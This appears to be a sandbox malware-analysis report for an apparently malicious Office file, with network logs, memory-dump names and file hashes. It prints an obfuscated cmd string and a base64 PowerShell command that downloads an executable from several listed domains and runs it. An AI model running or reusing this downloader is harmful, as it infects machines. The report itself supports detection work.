^ ^3 4^2^ ^ ^3^ ^ ^3 ^ ^ ^53^ ^3^ ^ ^ 6^0 ^27^ ^3^ ^3^8 ^6^6 ^3^ ^64 8^ 3 ^ 61 3^ ^ ^1^3^ ^ ^ 4^6 ^ ^ 3^ ^ 1^4^ 8 ^6^0 ^ ^3^2^ ^3 ^ ^ ^5^2 ^ ^ ^ 41 ^3^ ^ ^19 ^1^0 ^6^0^ 4^0 ^3 ^7 ^ ^ ^6^5 ^ ^3^ 0 ^ ^8 ^60^ 53 3^ ^ ^ 5^2 ^8^ ^ ^3 ^68^ 8^ 6^0 ^20 ^ 3^ 4^2^ 3^ 3^ ^ ^53 3^ ^ ^ ^60^ ^27^ ^ ^ ^3^ ^ 38 6^6^ ^3^ ^ ^6^4 ^ 8 3 ^ 5^4 ^ ^ ^3^ ^7 ^67^ ^3 ^ 5^5^ ^4^5^ ^ 60 2^3 ^ ^ 3 7^ 3^8 ^ ^3^ 16^ ^1^0^ ^ 3^ ^ ^ 5^4 3^ ^5^2 ^ 59^ ^3 ^ ^ ^ ^41 10 ^ ^6^0 36^ ^ 3^ 52^ ^8^ ^ ^3 ^41^ ^10^ ^ 6^0 ^ 48 ^ ^3^ 52 ^46 ^3 49^ ^8^ ^60 ^4^4 ^ ^ ^3^ 42^ 3^ ^3^ 67^ 3 3 45 3^ ^4^2 ^3 ^ ^3^ 6^7 ^ ^ ^ 3^ ^3 ^ ^4^5^ ^3 ^ ^4^2 3^ 3 67 ^3 ^ 3^ ^ ^4^5^ 3 4^2^ 3 3 6^7^ ^ 3^ ^ 3^ ^ ^45^ ^ ^ ^3 4^2^ 3 ^ ^ ^3 6^7^ ^ 3 ^3 ^ ^ ^ 45 ^3 ^4^2^ ^ 3 ^ 3 ^ ^ ^6^7^ 3 ^ ^3^ ^2^8 ^6^9) ^D^O S^e^T ^or^d=!^or^d!!R^0:~ %^S,1!&& ^I^f %^S G^tR ^68 C^a^l^L %^or^d:^~ ^ ^ 5% "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -e JABPAEoAcAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFkAagA9ACcAaAB0AHQAcAA6AC8ALwBqAG8AYgBhAHIAYgBhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZABzAHQAZgA2AEAAaAB0AHQAcAA6AC8ALwBsAGkAZwBoAHQAYgBvAHgALgBsAGIAZABlAHYALgBjAG8ALgB1AGsALwBXAEgAbAAyADMAOQBAAGgAdAB0AHAAOgAvAC8AYwBoAGEAbABsAGUAbgBnAGUAcgBiAGEAbABsAHQAbwB1AHIAbgBhAG0AZQBuAHQALgBjAG8AbQAvADUARQB2AG8AQABoAHQAdABwADoALwAvAHQAaABlAHAAcgBlAHMAZQBuAHQAYQB0AGkAbwBuAHMAdABhAGcAZQAuAGMAbwBtAC8AVgA1AG0AWABPAEkATwBIAEAAaAB0AHQAcAA6AC8ALwBkAGUAbQBvAC4ANQA4AGkAbgBzAGEAYQB0AC4AYwBvAG0ALwB0AHUARwBOADYARgBTACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABBAG4ASAAgAD0AIAAnADIAMAAzACcAOwAkAHoATgBZAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAEEAbgBIACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABpAFgAawAgAGkAbgAgACQAegBZAGoAKQB7AHQAcgB5AHsAJABPAEoAcAAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABpAFgAawAsACAAJAB6AE4AWQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJAB6AE4AWQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 jobarba.com udp
US 13.248.169.48:80 jobarba.com tcp
US 8.8.8.8:53 lightbox.lbdev.co.uk udp
GB 52.56.73.24:80 lightbox.lbdev.co.uk tcp
US 8.8.8.8:53 challengerballtournament.com udp
US 8.8.8.8:53 thepresentationstage.com udp
US 8.8.8.8:53 demo.58insaat.com udp
US 8.8.8.8:53 48.169.248.13.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 24.73.56.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.162:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 162.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 23.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
NL 23.62.61.194:443 www.bing.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp

Files

memory/216-2-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-1-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-3-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-4-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-0-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-5-0x00007FFD5C74D000-0x00007FFD5C74E000-memory.dmp

memory/216-6-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-7-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-9-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-11-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-8-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-12-0x00007FFD19EE0000-0x00007FFD19EF0000-memory.dmp

memory/216-10-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-14-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-15-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-13-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-16-0x00007FFD19EE0000-0x00007FFD19EF0000-memory.dmp

memory/216-17-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-19-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-18-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-43-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-52-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-53-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-55-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-54-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-57-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-58-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-59-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-56-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-51-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-50-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/3060-63-0x000001AB5BF40000-0x000001AB5BF62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hxklrbgc.4vx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\203.exe

MD5 e89f75f918dbdcee28604d4e09dd71d7
SHA1 f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA256 6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA512 8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

memory/216-183-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCD9A85.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

memory/216-569-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-570-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-571-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-572-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp

memory/216-591-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-590-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-592-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-593-0x00007FFD1C730000-0x00007FFD1C740000-memory.dmp

memory/216-594-0x00007FFD5C6B0000-0x00007FFD5C8A5000-memory.dmp